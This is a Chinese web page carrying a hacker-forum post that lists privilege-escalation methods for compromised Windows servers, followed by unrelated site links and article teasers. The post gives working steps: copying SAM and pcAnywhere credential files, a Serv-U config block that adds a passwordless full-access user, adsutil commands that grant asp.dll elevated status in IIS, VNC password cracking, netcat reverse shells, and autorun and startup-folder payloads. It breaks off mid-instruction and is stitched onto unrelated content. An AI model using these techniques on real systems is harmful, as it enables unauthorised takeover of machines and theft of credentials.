该怎么提权?Ring的权限提升21大法来帮你
以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过
的。本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。希望对朋友有帮助!
1.radmin连接法
条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去
。本人从来米成功过。,端口到是给对方打开了。
2.paanywhere
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF
文件,在本地安装pcanywhere上去
3.SAM破解
C:\WINNT\system32\config\ 下他的SAM 破解之
4.SU密码夺取
C:\Documents and Settings\All Users\「开始」菜单\程序\
引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
5.c:\winnt\system32\inetsrv\data\
引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,
然后执行
6.SU溢出提权
这个网上教程N多 不详细讲解了
7.运行Csript
引用:运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提
升权限
用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了
8.脚本提权
c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs
9.VNC
这个是小花的文章 HOHO
默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password
我们可以用vncx4
破解它,vncx4使用很简单,只要在命令行下输入
c:\>vncx4 -W
然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
10.NC提权
给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了
11.社会工程学之GUEST提权
很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他QQ号 邮
箱号 手机号 尽量看看 HOHO
12.IPC空连接
如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令
13.替换服务
这个不用说了吧?个人感觉相当复杂
14.autorun .inf
autorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信
他不运行
15.desktop.ini与Folder.htt
引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择“自定义
文件夹”(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder
setting的文件架与desktop.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”)然后
我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:
天网防火墙如何安装?天网防火墙怎么禁止本地用户使用ping命令?
任务一 正确安装天网防火墙任务二 利用防火墙进行以下实验1、禁止局域网用户使用PING命令对本机进行嗅探2、禁止本地QQ登录及应用3、禁止本地用户使用PING命令通过以上内容的学习,实际操作天网防火墙的设置,并
详情2018-01-22 10:55:31责编:llp 来源:驱动管家查找linux系统入侵证据的步骤,从这几方面下手
要查找linux系统入侵证据,可从如下几个方面入手:last,lastlog命令可查看最近登录的帐户及时间2 var log secure , var log messages日志信息可以通过accept关键字查看系统是否有被可疑IP地址登录成功信息。
详情2018-02-15 16:26:54责编:llp 来源:驱动管家怎么使用dos攻击工具阿拉丁来进行初步的dos攻击?
任务一 熟悉dos攻击器阿拉丁的使用根据老师发给我们的DOS攻击器,我们来进行初步的DOS攻击。我们会在监视器中看到,CPU的使用率时变低的,下面攻击开始设置数据,被攻击的IP地址,和攻击力度的大小。任务二 建
详情2018-02-07 19:37:03责编:llp 来源:驱动管家adobe photoshop简化版存在缓冲区溢出
受影响系统:Adobe Photoshop Album Starter Edition 3 2描述:BUGTRAQID: 28874CVE(CAN) ID: CVE-2008-1765Adobe Photoshop Album Starter Edition是Adobe公司专为处理相片的用户设计的Photoshop简
详情2018-02-02 16:37:56责编:llp 来源:驱动管家黑客入门 黑客攻击网站的常用策略
这篇文章主要介绍了黑客攻击网站的常用策略,你必须掌握!,需要的朋友可以参考下【1】虚假无线接入(WAP)策略虚假WAP比其他任何技术都更容易完成攻击。任何人,简单用一种软件或无线网卡,就能将自己的电脑渲染
详情2018-01-20 14:46:56责编:llp 来源:驱动管家保护你的隐私,grub密码怎么被md5加密?
GRUB——全称”Grand unified bootloader“的缩写,是GNU项目的一个启动加载包。在linux系统启动过程中,GRUB在MBR(主引导加载程序或主引导记录master boot record)之后启动,故又将GRUB称为次引导加载程序
详情2018-01-30 16:39:48责编:llp 来源:驱动管家openapi存在参数注入漏洞,影响所有整合openapi的应用
近日,一个广泛存在于Java、PHP、NodeJS和Ruby等流行语言开发应用的漏洞被发现,该漏洞存在于OpenAPI(Swagger Code Generator)中,属于参数注入漏洞,凡是整合Open API的应用都会受到影响。高危漏洞被发现,
详情2018-01-28 14:27:19责编:llp 来源:驱动管家linux防火墙怎么设置? 防火墙在linux系统上的应用
iptables 这个指令, 如同以下用 man 查询所见, 它用来过滤封包和做NAT Network Address Translation(网路位址转译), 这个指令的应用很多, 可以做到很多网路上的应用 iptables - administration tool
详情2018-01-04 08:58:02责编:llp 来源:驱动管家什么是sql注入?sql注入攻击的步骤
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没
详情2018-01-15 09:51:58责编:llp 来源:驱动管家cain还原加密密码?cain如何还原flashfxp密文?
或许你会这样问——Cain不是用来嗅探的吗?怎么能用来还原加密后的密码?没错!今天偶然发现Cain在渗透过程中还有一个不错的使用技巧,就是用来还原你从管理员电脑里拿来的flashfxp里的密文,大家都知道向任何地
详情2018-02-25 20:07:58责编:llp 来源:驱动管家
- 网络安全扫描器nmap怎么用?nmap的三种状态是什么?
- win7安装不了Arduino驱动的问题解决方法
- Win8如何开启隐藏Administrator账户
- Win8如何添加其他语言 Win8添加其他语言的方法
- hqx压缩文件如何在电脑上打开?hqx文件的介绍
- 教你这样在电脑上快速打开bmp文件
- 硬核玩家在Reddit上晒出自己收藏PS2游戏 宛如图书馆
- 华为于3月27日发布全新P20系列 有望搭载刘海屏幕
- 全新Ryzen 3000系处理器会使用全新架构以及7nm工艺
- thinkpad x230i 笔记本电脑开机进入BIOS的方法
- BIOS下UEFI选项灰色无法更改 OS选项已经关闭
- lumia 1520升级WP8.1需要做什么?有哪些注意事项?
- 黑莓z10售价比4400还高 黑莓z10配置揭秘
- 如何设置电脑一键关机 设置电脑一键关机的详细方法
- 怎样清除电脑垃圾 电脑提速清洁的小窍门
- Win8支持Aero毛玻璃特效吗
- 优雅用好win10的正确姿势 以下几点要注意
- 破解wifi密码的方式都有哪些?怎么防止wifi密码被破解
- haswell处理器的优点和缺点有哪些?haswell的介绍
- 国内第一家蚂蚁金服会员休息区进驻的广州白云机场